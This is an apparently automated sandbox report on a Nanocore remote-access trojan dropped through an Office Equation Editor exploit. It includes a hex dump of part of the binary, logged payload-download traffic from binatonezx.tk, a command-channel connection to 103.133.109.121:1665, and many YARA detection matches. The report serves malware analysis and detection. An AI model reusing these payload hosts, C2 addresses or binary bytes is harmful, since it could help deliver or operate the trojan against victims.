00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 b2 05 00 4f 00 00 00 00 c0 05 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fc 92 05 00 00 20 00 00 00 94 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 05 00 00 00 c0 05 00 00 06 00 00 00 96 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 b2 05 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 3f 00 00 e4 41 00 00 03 00 00 00 7d 00 00 06 a4 81 00 00 00 31 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 01 00 00 04 2a 22 02 03 7d 01 00 00 04 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 1e 02 7b 03 00 00 04 2a 22 02 03 7d 03 00 00 04 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 05 00 00 04 2a 00 00 00 13 30 03 00 38 00 00 00 01 00 00 11 00 73 0d 00 00 06 25 1f 42 6f 02 00 00 06 00 25 1f 50 6f 04 00 00 06 00 25 1f 44 6f 06 00 00 06 00 25 1f 49 6f 08 00 00 06 00 25 1f 57 6f 0a 00 00 06 00 0a 2b 00 06 2a 13 30 03 00 38 00 00 00 01 00 00 11 00 73 0d 00 00 06 25 1f 6f 6f 02 00 00 06 00 25 1f 2b 6f 04 00 00 06 00 25 1f 2d 6f 06 00 00 06 00 25 1f 2a 6f 08 00 00 06 00 25 1f 3d 6f 0a 00 00 06 00 0a 2b 00 06 2a 22 02 28 14 00 00 0a 00 2a 00 00 00 13 30 04 00 20 00 00 00 02 00 00 11 00 19 8d 0f 00 00 01 25 16 72 01 00 00 70 a2 25 17 72 37 00 00 70 a2 25 18 02 a2 0a 2b 00 06 2a 26 02 28 14 00 00 0a 00 00 2a 00 00
        Source: global trafficHTTP traffic detected: GET /catzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: binatonezx.tkConnection: Keep-Alive
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 103.133.109.121:1665
        Source: RegSvcs.exe, 00000007.00000002.706673086.00000000059A0000.00000002.00020000.sdmp, taskeng.exe, 0000000A.00000002.704777808.0000000001BC0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: schtasks.exe, 00000005.00000002.449453962.0000000000870000.00000002.00020000.sdmp, schtasks.exe, 00000008.00000002.460736263.0000000001CF0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
        Source: catzjt7863.exe, 00000004.00000002.457062751.00000000055D0000.00000002.00020000.sdmp, RegSvcs.exe, 00000007.00000002.706673086.00000000059A0000.00000002.00020000.sdmp, taskeng.exe, 0000000A.00000002.704777808.0000000001BC0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
        Source: catzjt7863.exe, 00000004.00000002.454334309.0000000000950000.00000004.00020000.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9294EB41-BC98-4811-8155-5BA310CE0BF9}.tmpJump to behavior
        Source: unknownDNS traffic detected: queries for: binatonezx.tk
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003D2EA6 WSARecv,
        Source: global trafficHTTP traffic detected: GET /catzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: binatonezx.tkConnection: Keep-Alive
        Source: RegSvcs.exeBinary or memory string: RegisterRawInputDevices

        E-Banking Fraud:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 7.2.RegSvcs.exe.3678c96.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.560000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.catzjt7863.exe.36dc7e0.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.564629.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.catzjt7863.exe.36dc7e0.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.catzjt7863.exe.35f0330.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.36820f5.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.367dacc.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.560000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.367dacc.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.catzjt7863.exe.359c310.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.706102715.0000000003676000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: catzjt7863.exe PID: 1848, type: MEMORYSTR

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 7.2.RegSvcs.exe.3678c96.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.2.RegSvcs.exe.3678c96.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 7.2.RegSvcs.exe.560000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.catzjt7863.exe.36dc7e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.catzjt7863.exe.36dc7e0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 7.2.RegSvcs.exe.550000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.2.RegSvcs.exe.564629.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.catzjt7863.exe.36dc7e0.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.catzjt7863.exe.36dc7e0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 7.2.RegSvcs.exe.2641260.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.catzjt7863.exe.35f0330.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.catzjt7863.exe.35f0330.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 7.2.RegSvcs.exe.36820f5.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 7.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 7.2.RegSvcs.exe.367dacc.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 7.2.RegSvcs.exe.560000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.2.RegSvcs.exe.367dacc.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 4.2.catzjt7863.exe.359c310.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.catzjt7863.exe.359c310.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000007.00000002.706102715.0000000003676000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000007.00000002.704921985.0000000000550000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: catzjt7863.exe PID: 1848, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: catzjt7863.exe PID: 1848, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RegSvcs.exe PID: 2936, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Office equation editor drops PE fileShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catzx[1].exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\catzjt7863.exeJump to dropped file
        Source: 7.2.RegSvcs.exe.3678c96.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.RegSvcs.exe.3678c96.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 7.2.RegSvcs.exe.3678c96.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 7.2.RegSvcs.exe.560000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.RegSvcs.exe.560000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.catzjt7863.exe.36dc7e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.catzjt7863.exe.36dc7e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.catzjt7863.exe.36dc7e0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 7.2.RegSvcs.exe.550000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.RegSvcs.exe.550000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 7.2.RegSvcs.exe.564629.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.RegSvcs.exe.564629.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 7.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 7.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.catzjt7863.exe.36dc7e0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.catzjt7863.exe.36dc7e0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.catzjt7863.exe.36dc7e0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 7.2.RegSvcs.exe.2641260.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.RegSvcs.exe.2641260.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.catzjt7863.exe.35f0330.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.catzjt7863.exe.35f0330.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 7.2.RegSvcs.exe.36820f5.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.RegSvcs.exe.36820f5.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 7.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 7.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 7.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 7.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 7.2.RegSvcs.exe.367dacc.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.RegSvcs.exe.367dacc.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
